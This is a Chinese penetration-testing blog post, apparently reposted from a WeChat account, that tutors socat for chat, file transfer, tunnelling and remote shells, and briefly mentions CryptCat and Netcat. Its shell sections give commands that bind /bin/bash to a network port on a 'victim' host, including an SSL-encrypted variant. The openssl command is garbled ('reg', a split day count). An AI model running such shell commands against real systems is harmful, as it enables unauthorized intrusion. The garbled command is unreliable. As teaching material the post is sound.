渗透测试中的哪些网络军刀

admin 2024年8月1日12:03:51评论20 views字数 1253阅读4分10秒阅读模式

本文,为大家简单介绍我们常见的网络工具的一些使用方法。

Socat

Socat 是 Linux 下的一个多功能的网络工具。可以看做是 Netcat 的加强版。Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE等。Nc可能是因为比较久没有维护,确实显得有些陈旧了。

😘安装

apt-get install socat

🤖监听 聊天工具

首先,我们在服务端开始监听。(谁做服务端,谁就要加stdout)

socat -dd tcp-listen:7777 stdout

渗透测试中的哪些网络军刀接下来,我们客户端连接。

socat - tcp4:192.168.50.77:7777
渗透测试中的哪些网络军刀

🐸正 反向弹shell

目标机(受害端)执行命令

socat tcp4-listen:8000 exec:/usr/bin/bash

攻击端执行命令

socat - tcp4:192.168.50.77:8000

效果如下:

渗透测试中的哪些网络军刀

😎文件传输

文件传输是最常用的,让我们一起看看如何实现。发送端执行命令

socat tcp4-listen:8000 file:kali.txt

接收端执行命令

socat tcp4:192.168.50.77:8000 file:kali.txt,creat
渗透测试中的哪些网络军刀

🐻‍❄️搭建异地组网

需要注意的是,服务端需为公网vps。

socat -d -d TCP-LISTEN:11443,reuseaddr TUN:192.168.255.1/24,up

客户端

socat TCP:xxx.xxx.xxx.xxx:11443 TUN:192.168.255.2/24,up #注意为公网IP和开启相关端口

📧SSL 连接

前面我们使用 socat 传 shell 的时候,其实交流的内容是明文传输的。为了让信息传输更加安全,我们借助 SSL 证书来完成这个操作。首先使用 openssl 这个软件,生成一个自签证书,为了让 socat 可以识别我们的证书和密钥,首先要把证书和密钥放进同一个文件中,并以.pem格式保存

openssl reg -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36
2 -out bind shell.crt

接下来,服务端执行命令

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

客户端执行命令

socat - OPENSSL:监听端的 IP:443,verify=0

当然,还有更多的玩法。大家可以参考命令帮助。

渗透测试中的哪些网络军刀

CryptCat

CryptCat具有双向加密功能。它可以跨网络连接读取和写入数据,使用 TCP 或 UDP协议。同时对通过网络传输的数据进行加密。详细教程请移步历史文章。

渗透测试中的哪些网络军刀
NC增强工具CryptCat

Netcat

之前也写过详细的使用文章,详细教程请移步历史文章。

渗透测试中的哪些网络军刀
Netcat(瑞士军刀)你想知道的都在这里

原文始发于微信公众号(kali笔记):渗透测试中的哪些网络军刀

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月1日12:03:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试中的哪些网络军刀https://cn-sec.com/archives/2986921.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息